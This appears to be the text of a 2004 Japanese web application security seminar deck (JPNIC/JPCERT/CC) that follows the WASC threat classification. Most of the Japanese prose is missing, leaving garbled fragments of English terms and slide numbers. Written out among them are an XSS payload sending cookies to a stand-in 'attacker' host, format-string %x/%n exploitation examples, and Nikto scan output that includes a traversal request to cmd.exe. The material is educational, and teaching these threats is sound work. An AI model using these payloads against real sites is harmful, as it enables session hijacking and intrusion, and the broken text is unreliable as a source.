JPNIC JPCERT/CC 2004 Web 2004 10 4 <shio@st.rim.or.jp>
Web Web Web WASC Web Application Security Consortium 7 Web Security Threat Classification Web URL 2
...?? It depends!? It depends!??? 3
? It depends!... 4
Web Web Web... Crosssite Scripting SQL... OS SYN Flood IP ARP TCP Reset......... 5
Web ID HTTP LDAP Web OS SQL SSI XPath WASC Web Security Threat Classification 6
Authentication...... Brute Force Insufficient Authentication Weak Password Recovery Validation 7
Authentication ID Web ID ID 8
Authentication URL URL URL... Web /admin/ Security Through Obscurity... 9
Authentication Web Web...... Web 10
Authorization...... ID Credential/Session Prediction Insufficient Authorization Insufficient Session Expiration Session Fixation 11
Web HTTP TCP ID ID ID ID 12
Authorization ID ID ID ID ID ID ID ID ID ID 13
ID SID:1234 SID:1235 ID SID:1235 SID:1234 SID:1234 SID:1235 SID:1235 SID:1235 14
Authorization URL URL URL... Security Through Obscurity... 15
Authorization ID Web ID... XSS back SSL 16
Authorization ID fix Web ID ID ID HTML URL XSS Cross-site Scripting Cookie Web ID ID Web Web ID ID ID IP 17
SID:1234 ID SID:1234 SID 1234 SID:1234 SID:1234 SID:1234 ID 1234 SID 1234 HTML ID SID:1234 SID 1234 18
Client-side Attacks Web Web Content Spoofing Cross-site Scripting 19
Client-side Attacks Web URL URL URL Web... URL URL 20
Client-side Attacks XSS Web JavaScript/VBscript Web Web IE Web Cookie ID Web 21
http://server/cgi?name=joe Cookie Hello Joe! Cookie... http://server/cgi?name =<script>document.lo cation='http://attacker /getcookie?'+document.cookie</script> Cookie... Cookie <script>document. location='http://att acker/getcookie?'+ document.cookie</ script> 22
Command Execution Web...... Buffer Overflow Format String Attack LDAP Injection OS Commanding SQL Injection SSI Injection XPath Injection 23
Command Execution C/C++ CGI C Web 24
25 BOF
Command Execution... printf() %s, %d, %x,... printf(buf); buf C/C++ CGI C %x %n 4 Web 26
printf("%x", 1); 1 16 printf(buf); buf "%x" 16 27
int i; printf("abcd%n", &i); i 4 printf(buf); buf "0xbffff658%x%x%x%x...%n" 0xbffff658 N 28
Command Execution LDAP LDAP LDAP Web LDAP 29
Command Execution OS OS Web Perl C PHP... 30
Command Execution SQL SQL Web Union... 31
Command Execution SSI SSI HTML Web HTML Web... SSI OS SSI 32
Command Execution XPath XPath... XML XPath XML Web 33
Information Disclosure Web... Directory Indexing Information Leakage Path Traversal Predictable Resource Location 34
Information Disclosure URL Web Apache 1.3; GET //////////... HTTP/1.0 Google Web 35
Information Disclosure Web HTML?... Web IP Web 36
Information Disclosure Traversal... Unicode UTF-8 NULL %00 OS Web 37
Information Disclosure....bak.old.org.orig....conf.cfg.config....dat.data... /admin/ /backup/ /logs/... 38
Nikto Web Nikto http://www.cirt.net/code/nikto.shtml $ perl nikto.pl -nolookup -host 192.168.183.12 --------------------------------------------------------------------------- - Nikto 1.34/1.29 - www.cirt.net + Target IP: 192.168.183.12 + Target Hostname: 192.168.183.12 + Target Port: 80 + Start Time: Thu Sep 30 07:27:42 2004 ---------------------------------------------------------------------------... + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK,UNLOCK + /<script>alert('vulnerable')</script>.shtml - Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)... + /blahb.ida - Reveals physical path....... + /xxxxx.htw - Server may be vulnerable to a Webhits.dll arbitrary file retrieval.... + /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir - IIS is vulnerable to a double-decode bug, which allows...... + /_vti_bin/fpcount.exe - Frontpage counter CGI has been found.......... + 2648 items checked - 20 item(s) found on remote host(s) + End Time: Thu Sep 30 07:28:28 2004 (46 seconds) --------------------------------------------------------------------------- + 1 host(s) tested 39
Logical Attacks Web... Web Abuse of Functionality Denial of Service Insufficient Anti-automation Insufficient Process Validation 40
Logical Attacks Web Web Web Web hidden Web Frontpage Server Extensions IIS WebDAV IIS hidden 41
Logical Attacks Web...... SQL Web Web 42
Logical Attacks Web 43
Logical Attacks hidden Cookie... 44
HTTP Response Splitting Location Web Web Server/Application Fingerprinting Cookie Web Web 45
...??? ID??? SQL?... Web Web 46
Web...!! 47
WASC Web Security Threat Classification http://www.webappsec.org/threat.html OWASP Top Ten http://www.owasp.org/documentation/topten.html OWASP A Guide to Building Secure Web Applications http://www.owasp.org/documentation/guide/guide_about.html @IT Web http://www.atmarkit.co.jp/fsecurity/rensai/webhole01/webhole01.htm @IT http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html HTTP Response Splitting http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf The Google Hackers Guide http://johnny.ihackstuff.com/security/premium/the_google_hackers_guide_ v1.0.pdf 48